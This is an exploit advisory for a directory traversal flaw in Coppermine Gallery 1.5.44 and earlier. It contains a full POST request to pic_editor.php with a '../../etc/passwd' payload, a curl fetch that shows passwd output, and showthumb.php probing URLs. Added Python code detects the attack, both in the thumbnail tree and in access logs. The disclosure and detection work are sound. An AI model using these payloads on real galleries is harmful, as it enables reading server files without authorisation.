
Coppermine Gallery 1.5.44 Directory Traversal

Posted Feb 15, 2017
Authored by Hacker Fantastic

Coppermine Gallery versions 1.5.44 and below suffer from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | 43fda03afc24d1a05660bc4321ec19661ba3c068b6c93e616a51d887d736f241

Coppermine Gallery <= 1.5.44 directory traversal vulnerability
==============================================================
Coppermine is a multi-purpose fully-featured and integrated web
picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend. A directory traversal vuln
exists within the "save_thumb" function of the "crop & rotate"
image feature. This can be accessed from pic_editor.php. First
upload a file, e.g. "hackerhouse.png" to an album. This will
create a predictable file path location with your userid e.g:

http://target/cpg15x/albums/userpics/10001/hackerhouse.png

You will then send a POST request to pic_editor to manipulate
this file but replace the "newimage" field with the filepath you
want to read such as "../../../../../etc/passwd". Your file
will then be copied to a predictable path location as thumb.

http://target/cpg15x/albums/userpics/10001/thumb_hackerhouse.png

To exploit this vulnerability you will need to be able to
register an account and upload files to a photo album. You
do not need admin rights to exploit this flaw. All versions
from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
to this flaw. The Coppermine configuration was tested with
ImageMagick enabled; your mileage may vary with GD1.x/GD2.x.

To protect against this exploit do not allow public registration
requests and only allow trusted users to modify images.

Example POST request
====================
POST /cpg15x/pic_editor.php HTTP/1.1
Host: target
Content-Length: 802
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
Accept: text/html,
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: <cookies>
DNT: 1
Connection: close

------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="clipval"

10
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="newimage"

../../../../../../../../../../../../../../etc/passwd
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="img_dir"

albums/edit/
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="angle"

45
------WebKitFormBoundaryAE29AdEqShlpLpDF
100
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="save_thumb"

Save as thumbnail
------WebKitFormBoundaryAE29AdEqShlpLpDF--

Example file download request
=============================
$ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
... snip
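
Because the copied file lands under albums/userpics/ as thumb_<name> and is served with its original non-image content, a defender can sweep that tree for thumbnails that are not images. The following is an added example, not part of the original advisory or of Coppermine; the function names are hypothetical, the sample tree is constructed, and it assumes thumbnails are PNG, JPEG or GIF.

```python
import os
import tempfile

# Leading bytes of the image types a gallery thumbnail is assumed to be.
IMAGE_MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")

def looks_like_image(path):
    """True if the file starts with a PNG, JPEG or GIF signature."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    return head.startswith(IMAGE_MAGIC)

def suspicious_thumbs(userpics_root):
    """Return thumb_* files under userpics_root whose content is not an image."""
    findings = []
    for dirpath, _dirs, files in os.walk(userpics_root):
        for name in files:
            if not name.startswith("thumb_"):
                continue
            full = os.path.join(dirpath, name)
            # A symlink or a non-image body both mean this is not a real thumbnail.
            if os.path.islink(full) or not looks_like_image(full):
                findings.append(os.path.relpath(full, userpics_root))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample data: genuine images plus one copied text file."""
    user_dir = os.path.join(root, "10001")
    os.makedirs(user_dir)
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    with open(os.path.join(user_dir, "hackerhouse.png"), "wb") as fh:
        fh.write(png)
    with open(os.path.join(user_dir, "thumb_holiday.png"), "wb") as fh:
        fh.write(png)
    with open(os.path.join(user_dir, "thumb_hackerhouse.png"), "wb") as fh:
        fh.write(b"root:x:0:0:root:/root:/bin/bash\n")
    return root

def demo():
    with tempfile.TemporaryDirectory() as root:
        return suspicious_thumbs(build_sample_tree(root))

if __name__ == "__main__":
    for rel in demo():
        print("non-image thumbnail:", rel)
```

On a live install, point suspicious_thumbs() at the gallery's albums/userpics directory and review each hit together with the owning user id in the path.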

An additional directory traversal vulnerability is present
in "showthumb.php" which can be used to stat() for the existence
of files by reviewing the error returned. You must have
sufficient rights to use this feature however.

/cpg15x/showthumb.php?picfile=../../../../../../etc/passwd
/cpg15x/showthumb.php?picfile=../../../../../../etc/non-existantfile

-- Hacker Fantastic
(http://www.myhackerhouse.com)
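
The showthumb.php probing described above travels in the query string, so it is visible in web server access logs. The following is an added example, not part of the original advisory: it assumes Apache combined log format, the log lines are constructed, and the function names are hypothetical. It decodes the picfile value repeatedly as a conservative detector choice, so percent-encoded forms are caught as well.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (Apache combined format), not from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Feb/2017:10:01:02 +0000] "GET /cpg15x/showthumb.php?picfile=../../../../../../etc/passwd HTTP/1.1" 200 512 "-" "curl/7.52"
203.0.113.7 - - [15/Feb/2017:10:01:03 +0000] "GET /cpg15x/showthumb.php?picfile=%2e%2e%2f%2e%2e%2fetc%2fnon-existantfile HTTP/1.1" 200 498 "-" "curl/7.52"
198.51.100.4 - - [15/Feb/2017:10:02:10 +0000] "GET /cpg15x/showthumb.php?picfile=holiday.jpg HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
198.51.100.4 - - [15/Feb/2017:10:02:11 +0000] "GET /cpg15x/displayimage.php?album=1&pid=3 HTTP/1.1" 200 9050 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Feb/2017:10:03:00 +0000] "GET /cpg15x/showthumb.php?picfile=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 498 "-" "curl/7.52"
"""

REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

def fully_unquote(value, max_rounds=3):
    """Percent-decode until stable so nested encodings normalise too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(path):
    """True for any '..' path segment or an absolute path."""
    segments = re.split(r"[\\/]+", path)
    return ".." in segments or path.startswith(("/", "\\"))

def find_showthumb_traversal(log_text):
    """Return (client, timestamp, decoded picfile) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/showthumb.php"):
            continue
        # parse_qs decodes once; fully_unquote handles further layers.
        for raw in parse_qs(url.query).get("picfile", []):
            value = fully_unquote(raw)
            if has_traversal(value):
                hits.append((client, when, value))
    return hits

if __name__ == "__main__":
    for hit in find_showthumb_traversal(SAMPLE_LOG):
        print(*hit)
```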
